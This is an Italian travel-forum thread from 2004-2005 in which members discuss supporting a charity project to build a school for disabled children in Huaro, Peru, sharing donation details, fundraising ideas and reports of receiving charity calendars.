PDA

Visualizza Versione Completa :

HUARO: "CI SONO STATO con MAGIE DELLE ANDE"!



Pagine : [1] 2

Ricky
11-10-2004, 10:39:08
Ci Sono Stato ha voluto intraprendere un cammino difficile ed impegnativo ma altrettanto stimolante ed importante; ha deciso infatti di cominciare ad aiutare in maniera il più tangibile possibile un amico, Gabriele Poli, e l'associazione Magie delle Ande di cui è presidente.
L'obiettivo è di quelli che sembrano sempre irrangiungibili: costruire un centro per la formazione e l'aiuto di decine di bambini diversamente abili a Huaro, in Perù!

Oggi, in home page, ne saprete di più.
Se dopo aver visto il tutto vorrete darci dei consigli, lanciare delle idee, darci degli aiuti concreti, postate qui di seguito.

ATTENZIONE: in assoluto è il Post a cui teniamo di più, ci serve a tutti i livelli il vostro aiuto!

Ricky
11-10-2004, 15:13:40
www.cisonostato.it/special/huaro/huaro_1.php (http://www.cisonostato.it/special/huaro/huaro_1.php)
Qui trovate tutto sul progetto Huaro; aspettiamo una valanga di post ragazzi: anche solo per avere nuove idee da parte vostra.!

Ricky
11-10-2004, 15:14:47
Il "progetto Huaro" è raggiungibile anche direttamente dalla homepage del sito: aiutateci a renderlo conosciuto a più gente possibile!

gabrielepoli
11-10-2004, 17:56:14
Ragazzi, è magnifico avervi con noi!!!

aroundtheworld66
11-10-2004, 18:25:15
Partecipo a questo forum le poche volte che ho un ritaglio di tempo, niente rispetto a lettori che hanno centinaia di commenti....
Ma ho seguito abbastanza l'evoluzione di CSS e voglio dirvi che questo mi sembra di gran lunga il più importante "accrescimento" del sito da quando lo frequento (circa un paio d'anni)....
Avevo già visto il sito di "Magie delle Ande" e credo che l'accoppiata possa produrre cose buone.... Cercherò di tenermi aggiornato sulle vostre iniziative e di divulgarle tra amici, colleghi e conoscenti.
Davvero complimenti! Gianni

leander
11-10-2004, 18:46:53
Grazie Gianni! :077:
Contiamo su tanti altri appoggi come il tuo!

mark
11-10-2004, 18:52:03
Ok ok, tutto molto interessante ma, a parte le dichiarazioni di solidarietà e simpatia, cosa possiamo fare di CONCRETO per dare una mano? ;)
Nel sito di Magie delle Ande ho trovato il numero di un conto corrente bancario (c/c 103338 Banca Popolare Etica Filiale di Vicenza) da usare per l'iscrizione all'Associazione. Possiamo usarlo anche per contributi?
C'è qualcos'altro che possiamo fare?
:bounce: :bounce: :bounce:

Ricky
11-10-2004, 21:21:50
Cara Grazia,
intanto fammi esordire con un... grazie, perchè sei una persona estremamente generosa e determinata.
Non avere fretta: adesso ci servono idee; vedrai che le cose concrete arriveranno eccome.
Comunque se... concretamente vuoi inviare offerte, non c'è problema; Gabriele indicherà in questo stesso post come farlo.
Ripetiamo che al momento ci servono idee, non abbiate paura a "buttarle giù": magari su 100 cose irrealizzabili o strampalate, 1 è quella giusta.
Una cosa importantissima poi, in questa fase, è quella del passaparola: più persone vengono a conoscenza del progetto Huaro e più possibilità ci sono che nasca qualcosa d'importante.

etta
11-10-2004, 21:32:20
Oltre che esser d'accordo con Grazia per la segnalazione di un c/c mi è venuto in mente che avvicinandosi le feste natalizie potrebbe essere un'idea vendere on line dei prodotti dell'artigianato locale. Quanto al passaparola lo farò sicuramente.
Aspetto ulteriori sviluppi
Etta

Ricky
12-10-2004, 08:04:42
Grazie Etta,
il C/C verrà presto segnalato.
Grazie anche per la tua idea, è questo ciò di cui abbiamo bisogno.

mark
12-10-2004, 09:43:10
E un progettino di adozioni a distanza? :love2: :love2:

gabrielepoli
12-10-2004, 09:59:04
Ciao ragazzi. Per quanto riguarda il c/c, naturalmente è possibile usare quello di Magie delle Ande (socio di Banca Etica), a meno che Cisonostato non desideri attivarne uno proprio.
Nel frattempo, queste sono le coordinate complete del conto (ricordatevi di inserire la causale "Progetto Huaro"):

Associazione Socioculturale Latinoamericana Magie delle Ande
Banca Popolare Etica
Filiale di Vicenza
Corso SS. Felice e Fortunato, 220
36100 Vicenza
ABI: 5018
CAB: 12100
C/C: 103338

L'idea delle adozioni a distanza è ottima (così come quella dell'artigianato o dei biglietti di auguri, dei calendari, ecc.) e stiamo pensando di proporre adozioni ad hoc per i nostri bimbi della scuola. Sarebbe utile se chi ha già esperienza ci potesse aiutare ad organizzare.
Grazie di cuore.

sangiopanza
12-10-2004, 10:03:06
Per vendere l'artigianato e per far conoscere le iniziative non può mancare la presenza ai vari mercatini e fiere del commercio equo e solidale, tipo Festambiente di Vicenza.

ignoagno
12-10-2004, 11:00:30
Mi sembra che questo post porti davvero ad una svolta decisiva!

Siete, ops, siamo grandi e voglio partecipare anch'io :022:

Sono andato a vedere il sito di "Magie delle Ande" e credo che insieme si possano fare delle cose eccellenti! Forza e coraggio :bounce:

fatemi sapere tutto sulle iniziative e le divulgherò ad amici, colleghi e conoscenti.

Bravissimi

Ricky
12-10-2004, 13:53:48
Grazie Ignoagno, non avevo dubbi che il "grande cuore" di Brescia sarebbe saltato fuori!
Grazie a Sangio, a Etta, a Grazia: adesso aspettiamo TUTTI ma proprio tutti gli altri, forza ragazzi!

Mariel74
12-10-2004, 15:18:55
Che bello, bene bravi!!! Mi attivo subito x una donazione, intanto per ogni cosa, se avete bisogno sono qui!!! :022:

Ricky
13-10-2004, 09:27:18
Grazie Mariel,
ci contiamo!
Ele dai, leggiti bene tutto e dicci che ne pensi!
Il nostro sogno sarebbe di dare ai ragazzi disabili di Huaro la scuola e poi la possibilità di inserirsi nel mondo del lavoro con adeguate strutture di supporto ed infine una "casa" in cui passare una serena vecchiaia.
Questo per far sì che una volta fuori dalla scuola non siano abbandonati a se stessi.
Il "sogno nel cassetto" poi, sarebbe quello di aprire un ambulatorio dentistico a Huaro, confidando nelle donazioni di associazioni varie e privati ed istruendo giovani neolaureati peruviani per gestirlo e mandarlo avanti.
Questo, a grandi linee, è il nostro progetto: tropo grande? Troppo pretenzioso?
Qualcuno sul forum aveva, tempo fa, questa frase in calce ai suoi messaggi: "se non credi più ai sogni, i sogni non crederanno più a te"

Ricky
13-10-2004, 10:13:33
Ci si potrebbe porre alcune domande, legittime.
1) Perchè Huaro e non Burkina Faso piuttosto che Etiopia o Brasile ecc?
Non c'è una risposta, i luoghi in cui il nostro aiuto può servire sono praticamente infiniti.
Diciamo che il caso, la simpatia reciproca, gli interessi comuni ci hanno fatto imbattere in Gabriele, il cui entusiasmo è contagioso; esiste inoltre un'associazione (Magie delle ande) che opera là già da tempo, quindi ci sono già contatti avviati, infrastrutture ecc.
2) Perchè non fare qualcosa per i disabili italiani?
Osservazione che viene spontanea ed è corretta, correttissima.
Un unico particolare: se la situazione di un disabile qui da noi è già grave, nei paesi andini la cosa è alla massima potenza.
Già coloro che non hanno problemi sono discriminati (non vedono neanche mai un medico, che non si "sporca le mani" con gente che non ha soldi e possibilità); figurate qual'è la situazione di chi ha handicap di qualsiasi tipo: è considerato alla stregua di un vero e proprio rifiuto.
Queste le motivazioni che ci hanno spinto a sostenere il "Progetto Huaro".

chass
13-10-2004, 10:30:31
Buongiorno Ricky,

e a tutta la community di CSS; purtroppo ho qualche problemino e non posso essere molto presente sul forum. Approfitto di questi pochi minuti solo per rispondere a questo topic che mi sembra molto interessante, perché ho sempre sentito dentro un desiderio di poter aiutare qualcuno che ne ha veramente bisogno. Sai, a volte mi viene da pensare che se vincessi al superenalotto, desidererei oltre che poter donare soldi ma di poter partecipare di persona, perché penso sia una esperienza che come poche altre di possa arricchire veramente tanto. Non so in che cosa potrei essere utile, non sono ne dottore né infermiere, ma solamente poter essere d’aiuto sarebbe già bellissimo.
Tra le cose che mi possono venire in mente, posso pensare ad uno spazio o una palestra per aiutare i disabili ad esercizi quotidiani con materiali appropriati per tali disfunzioni. Forse è un qualche cosa che è già nel progetto (non ho avuto ancora il tempo di leggere il resoconto), ma magari anche una cosa semplice dove si può dedicare momenti per il passatempo.
Scusate la fretta e l’imprecisione ma ora devo andare e complimenti a Gabriele.

Ciao Carlo.

leander
13-10-2004, 10:32:29
Qualcuno sul forum aveva, tempo fa, questa frase in calce ai suoi messaggi: "se non credi più ai sogni, i sogni non crederanno più a te"
L'avevo io, è di Vinicio Capossela, vado a rimetterla! :002:

Ricky
13-10-2004, 10:34:59
:)
L'esigenza che hai sentito tu Carlo è quella che ho sentito io: donare qualcosa di personale, personalissimo: il proprio tempo.
E' relativamente facile (meritorio al massimo, s'intende; ce ne fossero!) fare un'adozione a distanza, che implica un piccolo o grande dolore per il portafoglio; più difficile è aprire il proprio cuore completamente.
E' un cammino sul quale ci stiamo avventurando insieme, per la prima volta anche noi, ed è una cosa preziosa ricevere testimonianze come la tua.

occhidigatto
13-10-2004, 10:37:25
Io sono con voi, totalmente.... aspetto news ;)

Ricky
13-10-2004, 11:06:37
Grazie Occhi! ;)

sangiopanza
13-10-2004, 12:37:28
Esistono dei finanziamenti da parte dello stato e/o delle Regioni a favore di progetti di cooperazione. Non so se questi finanziamenti vengono erogati solo a ONG o ONLUS, ma qualcuno più addentro negli aspetti burocratici potrebbe informarsi.

orma71
13-10-2004, 14:21:42
Ho avuto esperienza (diretta) di cooperazione in Africa, indiretta in Bangladesh, e ora aspetto notizie! Se c'è qualcosa che si può fare... ben venga Gabriele Poli.

Ricky
13-10-2004, 14:31:54
www.cisonostato.it/special/huaro/huaro_1.php (http://www.cisonostato.it/special/huaro/huaro_1.php)
Per tutti coloro che "aspettano notizie" qui ce ne sono un bel po'!

etta
13-10-2004, 21:41:30
Mi è piaciuta molto l'idea del "fantasmino" e adesso aspetto di riceverlo a casa.
Saluti a tutti!
Etta :107:

Ricky
14-10-2004, 08:26:31
Il fantasmino cui si riferisce Etta, per coloro che sono "pigri" e non hanno voglia di scorrere tutte le pagine, si trova qui:
http://www.cisonostato.it/special/huaro/huaro_4.php
GRAZIE ETTA!

gabrielepoli
14-10-2004, 08:39:27
Ciao ragazzi: torno da un incontro con il ministro degli Esteri del Perù; pensavo di poter concludere di più, ma come sempre parlare con i politici è molto complicato, tuttavia, è stato comunque importante averlo conosciuto. I rapporti con le istituzioni peruviane sono molto buoni e credo che potremo avere il loro appoggio sotto parecchi punti di vista...escluso quello economico...
Ogni vostra idea è non solo bene accetta, ma pure utile; quello che ora dovremmo fare è rendere concrete le proposte e operare tutti assieme, secondo le proprie disponibilità di tempo e le proprie forze.
La scuola di Huaro è già in fase di costruzione: le informazioni che trovate in cisonostato.it e in magie delle ande sono però un poco datate, nel senso che il progetto è variato. Abbiamo pensato di costruire il centro scolastico per moduli, in modo tale da terminare completamente una fase per volta e renderla assolutamente funzionale ed usufruibile; infatti, le risorse economiche non sono grandi, quindi è meglio usarle con parsimonia. A fine inverno dovrebbe essere terminata la prima fase con la costruzione del muro di cinta (già in preparazione) e dei primi locali con aule, bagni e un ufficio. Ho tutto il progetto, piani compresi, ma ancora non sono riuscito a metterlo on line: lo farò appena possibile, in modo da poter fornire a tutti voi notizie più precise.
Per quanto riguarda la vendita di artigianato, è qualcosa che abbiamo in mente da tempo: credo che Sangio e l'associazione Asoc (una ong di Vicenza della quale fa parte Sangio e con cui siamo in ottimi rapporti) potrebbero darci una mano in tal senso, essendo molto più esperti di noi. Questo potrebbe valere anche per le adozioni a distanza che desideriamo proporre al più presto.
Nell'attesa di potervi fornire maggiori dettagli, vi ringrazio di tutto cuore, iniziando dallo splendido staff di Cisonostato, fino a tutti gli amici del forum.
Gabriele

trottola
14-10-2004, 08:42:29
Questo potrebbe valere anche per le adozioni a distanza che desideriamo proporre al più presto.
Nell'attesa di potervi fornire maggiori dettagli, vi ringrazio di tutto cuore, iniziando dallo splendido staff di Cisonostato, fino a tutti gli amici del forum.
Gabriele

Ciao Gabriele, ancora complimenti per tutto quello che fai.
mi candido come "mamma", fatemi sapere appena possibile.
un forte abbraccio.

Glisparisopra
14-10-2004, 09:19:51
Io ho spulciato abbastanza il sito ieri e avevo visto il fantasmino e la spilla con la quale si può contribuire avendo, diciamo così, anche un ritorno di qualche tipo!
In realtà scrivo un post solo oggi perché leggendo e rileggendo la pagina che ci hai segnalato (parlo di Ricky) cercavo di capire se c'è un modo concreto di aiutare diverso dalla donazione o da un acquisto. Non mi sembra di aver letto qualcosa in tal senso.
Non lo dico per me che, in tutta onestà, non avrei nè tempo nè modo di dare un aiuto diverso da quello economico (non navigo nell'oro quindi si tratterebbe comunque di un aiutino ahimè) ma per chi vuole fare qualcosa in prima persona.
Il progetto mi piace veramente tanto e un aiuto economico lo darò con tutto il cuore.
Volevo fare i complimenti a Gabriele e li estendo a Ci sono stato per la sensibilità che dimostra nel dare visibilità e supporto a tali iniziative.
E' veramente bello vedere cose di queso tipo.
Nel mio piccolo cercherò di far girare la voce il più possibile.
Buona giornata a tutti.

Ricky
14-10-2004, 09:20:57
;)
GRAZIE anche a te GSS!

gabrielepoli
14-10-2004, 10:22:50
Grazie Trottolita e grazie GSS.
Fare qualcosa, a parte gli aiuti economici? Bella domanda.
Per il momento, l'importante è costruire il centro scolastico materialmente, poi verranno mille altri piccoli o grandi problemi che, invece di crearci difficoltà, sono convinto ci stimoleranno sempre di più perché, da come stanno andando le cose, il Progetto Huaro diverrà una "cosa" davvero nostra, un obiettivo importante non solo per i ragazzi e le persone di Huaro, ma anche -cosa non certo indifferente- per le nostre vite.
Come in questo stesso thread (si scrive così?) ha già scritto Ricky, il progetto consiste in molto più della costruzione di quattro mura: ci sarà bisogno della formazione degli insegnanti (è previsto anche uno stage in Italia), la sensibilizzazione delle famiglie, non solo dei ragazzi disabili, ma dell'intero villaggio e in futuro, dell'intera provincia (compito complicato perché significa, per chi si occuperà di questo, prima di tutto comprendere le dinamiche sociali andine in generale e del villaggio in particolare e, quindi, di entrare in sintonia, per quanto possibile, con persone ricche di una cultura diversa dalla nostra); in seguito l'entusiasmante idea è di proseguire con il lavoro. Abbiamo pensato: quanto tempo i ragazzi potranno usufruire della scuola? Fino ai 20, 25, 30 anni? E poi? C'é il rischio molto grande che, al termine del percorso scolastico, queste persone si trovino spiazzate, magari costrette a tornare ad essere rinchiuse negli ambiti familiari dai quali non uscirebbero più...e allora tutto il nostro lavoro sarebbe stato inutile. Cosa fare, allora? Nella scuola esisteranno laboratori (ceramica, tessili e altro) dove i ragazzi potranno apprendere, secondo le possibilità, un lavoro, qualcosa che li aiuti a realizzarsi. Ma ora sorge un altro problema: anche se dovessero imparare a produrre artigianato (impossibile ipotizzare che la loro produzione possa competere con quella di professionisti o di artigiani preparati), a chi potrebbero proporre il proprio lavoro? Ecco l'idea: cercare di acquistare una grande casa (per fortuna i prezzi sono accessibili) a Huaro, ristrutturarla secondo i canoni andini ed adattarla a piccolo albergo/ristorante dove, i ragazzi meno "gravi" potranno lavorare (nella scuola insegneremmo a servire a tavola, a fare le pulizie, a cucinare...). Ottenuto questo risultato, ai turisti che tramite i viaggi venduti da Magie delle Ande stanno già iniziando a frequentare il villaggio (solo nell'arco di una giornata), sarà proposta la sosta di un giorno e una notte in paese, dove potranno vivere un'esperienza davvero irripetibile a contatto con la gente e dove, pure, contribuiranno a portare risorse che andranno a vantaggio dell'intera popolazione. Una notte a Huaro: lavoro per l'albergo e il ristorante. Una giornata a Huaro: conoscenza della realtà locale, della scuola, dei ragazzi e del loro lavoro: la produzione artigianale della scuola troverà nei visitatori acquirenti sensibili, che avranno l'opportunità di farsi nuovi amici. Tutto questo, però, potrebbe creare "gelosie" da parte della famiglie senza -fortuna loro- bimbi altrimenti abili; la proposta, a questo punto, è di creare una cooperativa di famiglie, di tutte le famiglie di Huaro, che potrebbero dedicarsi, oltre al secolare allevamento del bestiame e all'agricoltura, anche alla produzione di lane utilizzabili dai "nostri" ragazzi artigiani per la propria produzione, ma anche dagli stessi abitanti per una produzione in qualche modo differente che, anch'essi, potranno proporre ai turisti. Resta poi il non semplice problema di evitare di fare di Huaro un mercato: dovremmo cercare di limitare il turismo, per non ridurre Huaro a un circo.
Per quanto riguarda ancora i ragazzi, dovremo pensare poi anche al futuro, quando non saranno più in grado di lavorare (alcuni,i più gravi, non avranno mai questa possibilità) ed ecco quindi l'idea già prospettata da Ricky, di adattare una costruzione che fungerà da "Casa famiglia" e che ospiterà queste persone per sempre.
Di cosa ci sarà bisogno, quindi? Di volontari, di persone sensibili, di gente che abbia desiderio di dare una mano, ricordandosi sempre, tuttavia, che daremo una mano al villaggio, ma la daremo anche a noi stessi, perché aiutare gli altri significa, a mio parere, aiutare noi stessi. Avere uno scopo nella vita riempie di soddisfazioni legittime e ci aiuta ad affrontare l'esistenza in maniera positiva...ma mi fermo qui perché mi sono accorto che sto un poco esagerando...forse :)
Solo concludo che ci sarà bisogno di tutti, a prescindere che si sia medici dentisti, chirurghi, veterinari o altro: c'é bisogno di persone che sentano necessità, come accade a me, di dare e ricevere amore.
Ciao

mariel
17-10-2004, 20:56:41
Volevo innanzitutto congraturalrmi con Gabriele Poli e CSS per questa splendida iniziativa. Io che vivo e lavoro nel mondo della scuola non posso che essere entusiasta di un simile progetto. L'aiuto economico, per qualsiasi cifra uno sia in grado di offrire, è il minimo che si possa fare, però credo che la difficoltà maggiore sia reperire l'aiuto "fisico" di persone che diano effettivamente una mano ed allora, visto che usiamo internet per dialogare, perchè non mettere un banner (si chiamano così credo) del tipo "1 euro per i bambini di Huaro" sul sito, sui siti partner di CSS e su quanti altri sia possibile e, perchè no, inviarlo anche come messaggio in posta elettronica agli utenti del sito motivandone lo scopo?
Per ora il minimo che posso fare è inviare un piccolo contributo, poi con il tempo chissà.
Mariella

quello che facciamo è soltanto una goccia nell'oceano
ma se non ci fosse quella goccia
all'oceano mancherebbe.
(madre teresa di calcutta)

yberf
17-10-2004, 21:05:50
... alla faccia dell'idea Mariel!! Sarebbe una bella cosa davvero, magari scegliendo più canali di pubblicizzazione... prometto che ci lavoro! :)

Mariel74
17-10-2004, 21:13:48
Mariel, idea fantastica davvero!!! Complimenti! :)

gabrielepoli
18-10-2004, 08:01:02
Sono convinto anch'io che l'idea di Mariel sia splendida e sono certo che si possa realizzare abbastanza facilmente. 1 euro per Huaro è uno slogan perfetto. Da studiare è il metodo, cioé cercare il canale giusto per il versamento del contributo: si potrebbe fare un bonifico diretto al conto di Banca Etica, ma in questo caso chi versa avrebbe anche la spesa del bonifico stesso: qualcuno si intende di commissioni bancarie? Potremmo chiedere alle banche la rinuncia alla commissione? Altri modi?
Ricordate anche che vi è la possibilità, per chi lo volesse, di iscriversi all'associazione con un contributo di 15 euro mensili. Oltre ad aiutare il Progetto Huaro (ed altri futuri), chi si iscrive avrebbe diritto al 5% di sconto per viaggi in Perù con MdA e al corso di secondo livello di spagnolo on line (il primo livello è a disposizione di tutti, invece, basta iscriversi a Portale Perù -gratuitamente-).
Suggerimenti? Ciao.

mariel
18-10-2004, 21:42:32
Sono felice che la mia idea sia stata apprezzata ma questo, in fondo, non è che l'inizio del lavoro.
per quanto riguarda le commissioni bancarie le banche possono rinunciarvi visto il nobile motivo.
io effettuo un bonifico trimestrale per un'adozione a distanza e la mia banca ha rinunciato al compenso visto che si tratta di beneficienza.
Ma tra gli utenti di CSS non c'è nessun direttore di banca che si vuole fare portavoce di questo progetto? neanche un parente? nessuno?
Se qualcuno poi è in contatto con altre associazioni che hanno già sperimentato questo tipo di raccolta fondi potrebbe farsi carico di conoscere i dettagli tecnici e riferirli a Gabriele.
Ciao Mariella

Non importa quanto di da
ma quanto amore si mette nel dare

gabrielepoli
20-10-2004, 13:12:39
Ciao a tutti! In http://www.magiedelleande.it troverete le novità sul Progetto Huaro e un paio di foto dei piani. Fatemi sapere.
Ciao.

gabrielepoli
20-10-2004, 14:19:34
Giusto Ricky! Se vuoi, mettilo anche in Css.
Ciao.

Ricky
20-10-2004, 14:30:57
Giro la cosa a Yberf, che lo farà sicuramente.

trottola
21-10-2004, 08:59:52
Non ho il pc a casa (E' ROTTO PORCA P...) quindi qui non riesco a leggere tutto con calma.
Vi rinnovo però come sempre, l'offerta del mio aiuto.
Ciao Gabriele, un abbraccio.

gabrielepoli
22-10-2004, 12:02:29
grazie Trottolita :)

Ricky
30-10-2004, 08:06:59
NATURALMENTE non ci siamo affievoliti; stiamo lavorando ad un progettino che speriamo riesca ad andare in porto.
Per ora TOP SECRET, non dico di più; speriamo di aggiornarvi presto ;)

Sono sempre ben accette idee e considerazioni d'ogni tipo!

Ricky
23-11-2004, 14:43:38
RAGAZZI DATECI UNA MANO!
http://www.sudamerica.it/portali/peru/s ... ndario.php (http://www.sudamerica.it/portali/peru/servizi/negozio/calendario.php)

Ricky
23-11-2004, 14:48:39
Naturalmente potete acquistarne anche più di uno... :002:

andy
25-11-2004, 00:05:23
Ricky, chiedeva Oceano quanto tempo c'è per la consegna.

Voleva farne un po' come regalo di Natale ;) ;) ;)

leander
25-11-2004, 00:16:22
Andy, forse la cosa migliore da fare sarebbe contattare direttamente Gabriele sulla sua mail. In questo stesso topic ci sono suoi messaggi, con link alla sua casella.
Secondo logica, dovrebbero essere consegnati in tempo, visto che il 99% saranno regali di Natale, però...

gabrielepoli
25-11-2004, 08:36:42
Una volta ricevuto il pagamento, credo che per la consegna ci vorrà a circa una settimana.
Ciao e grazie per l'aiuto.

gabrielepoli
25-11-2004, 08:38:34
Grazie Leander :)

leander
25-11-2004, 10:36:58
Grazie Leander :)
:077:

Stryx
25-11-2004, 11:21:39
Ciao a tutti... ho appena letto il vostro progetto.

E' semplicemente magnifico... e ve lo dice una persona che nel mondo dei disabili ci sta dentro con tutte le scarpe.

Ho un fratello portatore di handicap dalla nascita (ha 19 anni)... non vi dico il travaglio di mia madre fin da quando era piccolino.. visite, medici.. almeno nei primi anni.
Poi è iniziato il periodo di battersi per ottenere qualcosa... quindi lotte per ottenere benefici economici dalla regione, cercare donazioni dai privati, passare ore a parlare con politici, sindaci ecc...

Fortunatamente mio fratello frequenta un centro diurno dove passa tutti i suoi pomeriggi.. e dove vengono effettuate varie attività, teatro, musicoterapia, ceramica ecc...

Ma chiaramente anche se esiste questo centro diurno...bè le nostre lotte (mie, di mia madre e dell'associazione di cui facciamo parte) non finiscono qua. non ci si ferma mai.. è sempre una battaglia trovare i fondi per far viaggiare i nostri ragazzi... per le loro attività...
E ci si arrangia come si può... a natale parto anche io con la vendita dei loro calendari.
E pensate che anche io ne ho venduti tanti tramite internet, ho meglio tramite il sito di motociclisti dove sono moderatrice.
Ho avuto tanta solidarietà... e non vedo perchè non dovrei ridarla.. a qualcun altro... magari proprio a voi

Sono dell'opionione che ciò che dai ricevi...

Sono un illusa? sogno troppo? mah preferisco essere cosi... preferisco sognare in qualche cosa di bello, che mi faccia sperare che i disabili abbiano il loro posto nella vita di tutti i giorni, che mi faccia sperare che l'emarginazione non esista piu...

Io sogno, ma nel mentre concretizzo attivandomi per loro, e ora anche per voi.. anche se si tratterrà solo di comprare un calendario.

In bocca al lupo di cuore per il vostro progetto.
con affetto. Daniela

Ricky
25-11-2004, 11:24:00
Grazie Daniela, parole come le tue danno gli stimoli giusti.

gabrielepoli
25-11-2004, 13:00:58
Cara Daniela, ti comprendo tu non immagini quanto!
Pure io ho un fratello portatore di handicap e ho vissuto tutta la mia vita legato a questo dramma familiare e della società.
I miei genitori hanno fondato la sezione Anffas di Vicenza, mio fratello maggiore ne è il presidente attuale...ed ora, con Cisonostato e Magie delle Ande abbiamo l'opportunità di costruire questo importante futuro per i "nostri" ragazzi di Huaro.
Non sei un'illusa, ma una sognatrice...e sognare è fondamentale per tutti: sono i sogni che danno la forza di realizzare i progetti!
Credo che potremo fare qualcosa tutti assieme, in futuro, anche con te, se ti va.
Grazie per le tue belle parole.
Gabriele

01-12-2004, 02:10:22
Una volta ricevuto il pagamento, credo che per la consegna ci vorrà a circa una settimana.
Ciao e grazie per l'aiuto.

arrivati questa mattina; velocissimi .......

e grazie ancora per la passione l'impegno che mettete in questo progetto

un bacio a voi ed ai bimbi

poochie76
01-12-2004, 11:19:58
Io ho avuto dei problemi con il bonifico: appena metto tutto a posto faro' anche io il mio ordine.
Una domanda: ma che formato sono qs calendari?
Grazie! ;)

gabrielepoli
01-12-2004, 12:25:17
Il formato è quello classico, ma non chiedermi le misure esatte, per favore :)
Ciao

poochie76
01-12-2004, 12:33:32
Era giusto una curiosità per capire se è un calendario formato piccolo da scrivania o grande da appendere!
Sai, lo voglio mettere in ufficio in modo da far conoscere qs progetto. ;)

gabrielepoli
01-12-2004, 12:49:48
Sì, è da appendere. Grazie!
Stiamo preparando anche le schede per le adozioni a distanza dei bimbi; spero di poterle inserire presto.
Ciao!
Gabriele

mariel
01-12-2004, 21:19:40
E' arrivato questa mattina!!! :168:
il calendario è veramente bello e le foto sono molto suggestive.
è arrivato subito! ho fatto l'ordine il 26 e oggi è già appeso.

Poochie le misure esatte sono 48 x 34 (centimetri naturalmente ;)
ed in ufficio farà un figurone!


ragazzi, non indugiate, un piccolo gesto come l'acquisto di un calendario per i bimbi di Huaro può valere veramente molto!
Ciao Mariel
:107:

gabrielepoli
02-12-2004, 08:41:30
Grazie Mariel! :)

gabrielepoli
07-12-2004, 13:22:23
Grazie Maria Antonietta e grazie Cisonostato!
Iniziano ad arrivare i primi contributi per il progetto Huaro...e che contributi! Sono felice perché queste sono le basi per andare avanti con entusiasmo e l'entusiasmo, se sempre alimentato, conduce al successo di tutti noi, dei bimbi e delle famiglie di Huaro!

etta
07-12-2004, 22:35:36
Mi fa piacere che sia arrivato così presto perchè la valuta per il beneficiario prevista era quella del 9/12.
Vorrei anche aggiungere quello che non ho potuto inserire nella descrizione del bonifico e cioè che ho inteso in questo modo onorare la memoria della mamma, della mia amica. che era grande appassionata di viaggi e che è mancata a fine novembre.
Grazie di avermene dato la possibilità.
Etta

pinotina
07-12-2004, 23:34:34
Con mia vergogna, ho spulciato topic e progetto solo oggi.
Anche io lavoro a scuola e, visto che in sala inseganti manca un calendario, perchè non metterci qusto qua???? Provvedo.
Vista l'idea di Mariel (1€ per Huaro), perchè non sfruttare anche il sistema degli sms? Io da utente lo apprezzo molto ed utilizzo spesso, qualcuno sa come fare?
Aspetto notizie sulle adozioni a distanza.

leander
08-12-2004, 00:39:36
Con mia vergogna, ho spulciato topic e progetto solo oggi.
Anche io lavoro a scuola e, visto che in sala inseganti manca un calendario, perchè non metterci qusto qua???? Provvedo.
Vista l'idea di Mariel (1€ per Huaro), perchè non sfruttare anche il sistema degli sms? Io da utente lo apprezzo molto ed utilizzo spesso, qualcuno sa come fare?
Aspetto notizie sulle adozioni a distanza.

Grazie dei consigli, Ale. L'idea degli SMS non è nuova, ma tecnicamente non è così semplice come può sembrare dall'esterno.
Credo comunque che Yberf la abbia in agenda, anche se è impossibile fare previsioni sulle possibilità e sui tempi di realizzazione.

Ricky
09-12-2004, 19:00:03
Ricordo che è possibile fare adozioni a distanza nell'ambito del progetto Huaro.
Trovate tutte le indicazioni qui!
http://www.sudamerica.it/newsletter/nl. ... 09-12-2004 (http://www.sudamerica.it/newsletter/nl.php?codice=001&data=09-12-2004)

gabrielepoli
10-12-2004, 11:31:15
Ora l'indirizzo corretto è
http://www.magiedelleande.it/servizi/adozioni/index.php

Entro domani dovremmo attivare il nuovo dominio ad hoc!
ciao

mark
13-12-2004, 18:17:33
Sono arrivati i calendari, grazie!!!
Le foto sono bellissime!
:022: :022: :022:

chass
15-12-2004, 09:34:05
Anche se in ritardo, purtroppo ultimamente non ho avuto la possibilità di collegarmi, voglio partecipare a questa bella iniziativa.
Credo che vale il detto meglio tardi che mai, anche se i calendari arrivano a gennaio già inoltrato non fa niente....

andy
15-12-2004, 10:25:11
arrivano veramente velocemente.

A noi sono arrivati in pochissimi giorni.
:) :) :) :)

poochie76
15-12-2004, 10:32:50
Grazie a GF, ho potuto effettuare il bonifico: attendo il calendario con ansia!! :022:

chass
15-12-2004, 11:02:26
Anche io Flora, ho problemi con il bonifico, ma chi è GF, il Grande Fratello, per caso? A parte gli scherzi, avevo prima la possibilità dal mio pc di effettuare il bonico on-line, ma me l'hanno tolto ed ora non ho più un mio pc a disposizione e non posso riattivare il servizio su questo.

poochie76
15-12-2004, 11:21:09
Anche io Flora, ho problemi con il bonifico, ma chi è GF, il Grande Fratello, per caso?

GF è il mio boy :005:

chass
15-12-2004, 11:30:44
Ah, allora digli se mi fa un bonico pure da parte mia, visto che è così bravo a risolvere questo tipo di problemi :027: :002:

poochie76
15-12-2004, 11:43:00
Ah, allora digli se mi fa un bonico pure da parte mia, visto che è così bravo a risolvere questo tipo di problemi :027: :002:

:002: :002:

chass
16-12-2004, 09:35:04
Volevo sapere se il bonifico è l'unica modalità di pagamento.

Grazie.

mark
16-12-2004, 11:44:50
Volevo sapere se il bonifico è l'unica modalità di pagamento.

Grazie.

Io ho pagato con la carta di credito.

andy
16-12-2004, 12:00:09
Anche noi.
:) :) :) :)

gabrielepoli
17-12-2004, 13:22:45
Cari amici, sono davvero contento perché già quattro dei nostri bimbi sono stati adottati: si tratta di un aiuto davvero molto importante per le loro poverissime famiglie e di un supporto notevole che permetterà, fra le altre cose, ai nostri ragazzi di ricevere cure adeguate.
Per quanto riguarda la domanda di Chas, come già altri amici hanno risposto, confermo che oltre al bonifico è possible versare con la carta di credito mediante Paypal, come da indicazioni del sito.
Ciao a tutti!!!

leander
17-12-2004, 19:37:54
Vergognosamente, non avevo ancora ordinato i calendari... :015:
Ho appena provveduto!!!
http://www.sudamerica.it/portali/peru/servizi/negozio/images/calendario_2005.jpg
Confermo la praticità del pagamento con carta di credito tramite Paypal.

Mariel74
26-12-2004, 19:52:45
26 dic 18:31 Peru': sindaco ucciso da sicari


LIMA - E' stato assassinato oggi da sicari appartenenti al narcotraffico il sindaco della cittadina peruviana di Juajui'. (Agr)

poochie76
08-01-2005, 21:02:21
Appena rientrata dalle mie vacanze e cosa ho trovato? Il calendario di Huaro: beh...meraviglioso!!

Grazie!

gabrielepoli
13-01-2005, 12:34:29
Ciao amici, vi invito ad andare a leggere gli aggiornamenti, con relative foto, del Progetto Huaro.
